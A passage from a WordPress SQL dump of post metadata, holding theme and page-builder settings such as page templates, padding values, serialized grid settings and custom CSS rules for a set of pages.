100px'),(53011,1382,'_dp_original','1297'),(53012,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53013,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53014,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53015,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53016,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53017,1393,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53018,1393,'_wp_page_template','full-width.php'),(53019,1393,'slide_template','default'),(53020,1393,'_wpb_vc_js_status','true'),(53021,1393,'mkdf_page_content_behind_header_meta','no'),(53022,1393,'mkdf_disable_vertical_header_background_image_meta','no'),(53023,1393,'mkdf_disable_header_widget_areas_meta','no'),(53024,1393,'mkdf_page_content_padding','120px 0 110px'),(53025,1393,'_dp_original','1382'),(53026,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53027,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(53028,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53029,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53030,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53031,1642,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53032,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(53033,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(53034,1642,'_wpb_shortcodes_custom_css','.vc_custom_1534517315799{padding-bottom: 120px !important;}'),(53035,1642,'_wp_page_template','full-width.php'),(53036,1642,'slide_template','default'),(53037,1642,'_wpb_vc_js_status','true'),(53038,1642,'mkdf_page_content_behind_header_meta','no'),(53039,1642,'mkdf_disable_vertical_header_background_image_meta','no'),(53040,1642,'mkdf_disable_header_widget_areas_meta','no'),(53041,1642,'mkdf_page_content_padding','120px 0'),(53042,1642,'_dp_original','1297'),(53043,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53044,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53045,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53046,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53047,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53048,1650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53049,1650,'_wp_page_template','full-width.php'),(53050,1650,'slide_template','default'),(53051,1650,'_wpb_vc_js_status','true'),(53052,1650,'mkdf_page_content_behind_header_meta','no'),(53053,1650,'mkdf_disable_vertical_header_background_image_meta','no'),(53054,1650,'mkdf_disable_header_widget_areas_meta','no'),(53055,1650,'mkdf_page_content_padding','30px 0'),(53056,1650,'_dp_original','1642'),(53057,1650,'_wpb_shortcodes_custom_css','.vc_custom_1534518584017{padding-top: 30px !important;}'),(53058,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53059,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53060,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53061,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53062,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53063,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53064,1658,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53065,1658,'_wp_page_template','full-width.php'),(53066,1658,'slide_template','default'),(53067,1658,'_wpb_vc_js_status','true'),(53068,1658,'mkdf_page_content_behind_header_meta','no'),(53069,1658,'mkdf_disable_vertical_header_background_image_meta','no'),(53070,1658,'mkdf_disable_header_widget_areas_meta','no'),(53071,1658,'mkdf_page_content_padding','120px 0'),(53072,1658,'_dp_original','1650'),(53073,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53074,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53075,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53076,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53077,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53078,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53079,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53080,1662,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53081,1662,'_wp_page_template','full-width.php'),(53082,1662,'slide_template','default'),(53083,1662,'_wpb_vc_js_status','true'),(53084,1662,'mkdf_page_content_behind_header_meta','no'),(53085,1662,'mkdf_disable_vertical_header_background_image_meta','no'),(53086,1662,'mkdf_disable_header_widget_areas_meta','no'),(53087,1662,'mkdf_page_content_padding','120px 0 105px'),(53088,1662,'_dp_original','1658'),(53089,1679,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53090,1679,'_wp_page_template','blog-standard'),(53091,1679,'slide_template','default'),(53092,1679,'_wpb_vc_js_status','false'),(53093,1679,'mkdf_page_content_behind_header_meta','no'),(53094,1679,'mkdf_blog_category_meta','recepies'),(53095,1679,'mkdf_show_posts_per_page_meta','5'),(53096,1679,'mkdf_sidebar_layout_meta','sidebar-25-right'),(53097,1679,'mkdf_disable_vertical_header_background_image_meta','no'),(53098,1679,'mkdf_disable_header_widget_areas_meta','no'),(53099,1679,'mkdf_page_content_padding','120px 0 100px'),(53100,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53101,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(53102,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53103,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53104,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53105,1722,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53106,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(53107,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(53108,1722,'_wpb_shortcodes_custom_css','.vc_custom_1534774802696{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1534165726623{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534773952847{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165780856{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165820540{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534165836132{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846539016{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846548790{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846476531{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1534846495355{padding-right: 0px !important;padding-left: 0px !important;}'),(53109,1722,'_wp_page_template','full-width.php'),(53110,1722,'slide_template','default'),(53111,1722,'_wpb_vc_js_status','true'),(53112,1722,'mkdf_page_content_behind_header_meta','no'),(53113,1722,'mkdf_disable_vertical_header_background_image_meta','no'),(53114,1722,'mkdf_disable_header_widget_areas_meta','no'),(53115,1722,'mkdf_page_content_padding','0'),(53116,1722,'_dp_original','1297'),(53117,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53118,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(53119,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53120,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53121,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53122,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53123,1734,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53124,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(53125,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(53126,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(53127,1734,'_wpb_shortcodes_custom_css','.vc_custom_1534845914289{padding-top: 120px !important;padding-bottom: 45px !important;}.vc_custom_1534845920739{padding-top: 120px !important;padding-bottom: 45px !important;}'),(53128,1734,'_wp_page_template','full-width.php'),(53129,1734,'slide_template','default'),(53130,1734,'_wpb_vc_js_status','true'),(53131,1734,'mkdf_page_content_behind_header_meta','no'),(53132,1734,'mkdf_disable_vertical_header_background_image_meta','no'),(53133,1734,'mkdf_disable_header_widget_areas_meta','no'),(53134,1734,'mkdf_page_content_padding','0'),(53135,1734,'_dp_original','1722'),(53136,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53137,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53138,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53139,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53140,1742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53141,1742,'_wp_page_template','full-width.php'),(53142,1742,'slide_template','default'),(53143,1742,'_wpb_vc_js_status','true'),(53144,1742,'mkdf_page_content_behind_header_meta','no'),(53145,1742,'mkdf_disable_vertical_header_background_image_meta','no'),(53146,1742,'mkdf_disable_header_widget_areas_meta','no'),(53147,1742,'mkdf_page_content_padding','120px 0 0'),(53148,1742,'_dp_original','1297'),(53149,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53150,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53151,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53152,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53153,3073,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53154,3073,'_wp_page_template','full-width.php'),(53155,3073,'slide_template','default'),(53156,3073,'_wpb_vc_js_status','true'),(53157,3073,'mkdf_page_content_behind_header_meta','no'),(53158,3073,'mkdf_disable_vertical_header_background_image_meta','no'),(53159,3073,'mkdf_disable_header_widget_areas_meta','no'),(53160,3073,'mkdf_page_content_padding','110px 0 120px'),(53161,3073,'_dp_original','1297'),(53162,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53163,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53164,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53165,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53166,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53167,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53168,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53169,1804,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53170,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53171,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53172,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53173,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53174,1804,'_wpb_shortcodes_custom_css','.vc_custom_1534853329041{padding-bottom: 125px !important;}.vc_custom_1534853344872{padding-bottom: 125px !important;}.vc_custom_1534850453758{padding-right: 80px !important;padding-bottom: 60px !important;padding-left: 80px !important;}'),(53175,1804,'_wp_page_template','full-width.php'),(53176,1804,'slide_template','default'),(53177,1804,'_wpb_vc_js_status','true'),(53178,1804,'mkdf_page_content_behind_header_meta','no'),(53179,1804,'mkdf_disable_vertical_header_background_image_meta','no'),(53180,1804,'mkdf_disable_header_widget_areas_meta','no'),(53181,1804,'mkdf_page_content_padding','120px 0 70px'),(53182,1804,'_dp_original','1734'),(53183,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53184,1805,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53185,1805,'_wp_page_template','full-width.php'),(53186,1805,'slide_template','default'),(53187,1805,'_wpb_vc_js_status','true'),(53188,1805,'mkdf_page_content_behind_header_meta','no'),(53189,1805,'mkdf_page_content_padding','0 0 0 0'),(53190,1805,'mkdf_page_content_padding_mobile','0 0 0 0'),(53191,1805,'mkdf_header_type_meta','header-minimal'),(53192,1805,'mkdf_disable_vertical_header_background_image_meta','no'),(53193,1805,'mkdf_disable_header_widget_areas_meta','no'),(53194,1805,'mkdf_show_title_area_meta','no'),(53195,1805,'mkdf_disable_footer_meta','yes'),(53196,1805,'_dp_original','569'),(53197,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53198,1811,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53199,1811,'_wp_page_template','full-width.php'),(53200,1811,'slide_template','default'),(53201,1811,'_wpb_vc_js_status','true'),(53202,1811,'mkdf_page_content_behind_header_meta','no'),(53203,1811,'mkdf_page_content_padding','0 0 0 0 '),(53204,1811,'mkdf_page_content_padding_mobile','0 0 0 0'),(53205,1811,'mkdf_set_menu_area_position_meta','center'),(53206,1811,'mkdf_disable_vertical_header_background_image_meta','no'),(53207,1811,'mkdf_menu_area_background_color_meta','#ffffff'),(53208,1811,'mkdf_menu_area_background_transparency_meta','40%'),(53209,1811,'mkdf_disable_header_widget_areas_meta','no'),(53210,1811,'mkdf_show_title_area_meta','no'),(53211,1811,'mkdf_disable_footer_meta','yes'),(53212,1811,'mkdf_header_type_meta','header-standard'),(53213,1811,'mkdf_custom_header_widget_area_one_meta','custom-opener'),(53214,1811,'mkdf_header_behaviour_meta','no-behavior'),(53215,1811,'_dp_original','1008'),(53216,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53217,1819,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53218,1819,'_wp_page_template','default'),(53219,1819,'slide_template','default'),(53220,1819,'_wpb_vc_js_status','true'),(53221,1819,'mkdf_page_content_behind_header_meta','no'),(53222,1819,'mkdf_disable_vertical_header_background_image_meta','no'),(53223,1819,'mkdf_disable_header_widget_areas_meta','no'),(53224,1819,'mkdf_show_title_area_meta','no'),(53225,1819,'mkdf_disable_footer_meta','yes'),(53226,1819,'mkdf_menu_area_in_grid_meta','yes'),(53227,1819,'mkdf_header_type_meta','header-minimal'),(53228,1819,'mkdf_page_content_padding','0 0 0 0'),(53229,1819,'mkdf_page_content_padding_mobile','0 0 0 0'),(53230,1819,'_dp_original','610'),(53231,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53232,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53233,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53234,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53235,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53236,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53237,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53238,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53239,1827,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53240,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53241,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53242,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53243,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53244,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53245,1827,'_wpb_shortcodes_custom_css','.vc_custom_1534855033686{padding-top: 40px !important;}.vc_custom_1534855045184{padding-top: 40px !important;}'),(53246,1827,'_wp_page_template','full-width.php'),(53247,1827,'slide_template','default'),(53248,1827,'_wpb_vc_js_status','true'),(53249,1827,'mkdf_page_content_behind_header_meta','no'),(53250,1827,'mkdf_disable_vertical_header_background_image_meta','no'),(53251,1827,'mkdf_disable_header_widget_areas_meta','no'),(53252,1827,'mkdf_page_content_padding','120px 0 100px'),(53253,1827,'_dp_original','1804'),(53254,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53255,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53256,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53257,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53258,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53259,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53260,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53261,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53262,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53263,1836,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53264,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53265,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53266,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53267,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53268,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53269,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53270,1836,'_wpb_shortcodes_custom_css','.vc_custom_1534856850202{padding-bottom: 50px !important;}'),(53271,1836,'_wp_page_template','full-width.php'),(53272,1836,'slide_template','default'),(53273,1836,'_wpb_vc_js_status','true'),(53274,1836,'mkdf_page_content_behind_header_meta','no'),(53275,1836,'mkdf_disable_vertical_header_background_image_meta','no'),(53276,1836,'mkdf_disable_header_widget_areas_meta','no'),(53277,1836,'mkdf_page_content_padding','120px 0 140px'),(53278,1836,'_dp_original','1827'),(53279,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53280,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53281,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53282,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53283,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53284,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53285,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53286,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53287,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53288,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53289,1852,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53290,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53291,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53292,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53293,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53294,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53295,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53296,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53297,1852,'_wpb_shortcodes_custom_css','.vc_custom_1535122900444{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1535122907740{padding-top: 120px !important;padding-bottom: 110px !important;}.vc_custom_1534857575519{padding-top: 120px !important;padding-bottom: 130px !important;}'),(53298,1852,'_wp_page_template','full-width.php'),(53299,1852,'slide_template','default'),(53300,1852,'_wpb_vc_js_status','true'),(53301,1852,'mkdf_page_content_behind_header_meta','no'),(53302,1852,'mkdf_disable_vertical_header_background_image_meta','no'),(53303,1852,'mkdf_disable_header_widget_areas_meta','no'),(53304,1852,'mkdf_page_content_padding','0'),(53305,1852,'_dp_original','1836'),(53306,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53307,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53308,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53309,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53310,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53311,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53312,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53313,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53314,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53315,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53316,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53317,1857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53318,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53319,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53320,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53321,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53322,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1534860032793{padding-top: 95px !important;padding-bottom: 33px !important;}.vc_custom_1535443760685{padding-top: 95px !important;padding-bottom: 33px !important;}'),(53323,1857,'_wpb_shortcodes_custom_css','.vc_custom_1534860044567{padding-top: 95px 